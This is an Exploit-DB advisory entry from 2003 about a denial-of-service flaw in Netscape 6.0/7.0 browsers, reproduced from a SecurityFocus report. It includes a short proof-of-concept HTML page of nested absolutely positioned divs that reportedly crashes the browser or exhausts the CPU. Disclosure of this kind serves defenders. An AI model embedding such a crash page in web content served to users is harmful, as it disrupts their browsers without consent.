Netscape 6.0/7.0 Style Sheet Denial of Service Vulnerability

2003-02-25T00:00:00
ID EDB-ID:22286
Type exploitdb
Reporter Jocke
Modified 2003-02-25T00:00:00

Description

Netscape 6.0/7.0 Style Sheet Denial Of Service Vulnerability. Dos exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/6937/info

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when rendering certain style sheet code.

If a malicious page is viewed the browser reportedly becomes unstable. One possible condition mentioned was critical failure of the browser while another condition reportedly utilized all CPU resources. 

<html> <body>
<div style="position:absolute;">
<div style="position:absolute; overflow:scroll"> </div> </div>
</body> </html>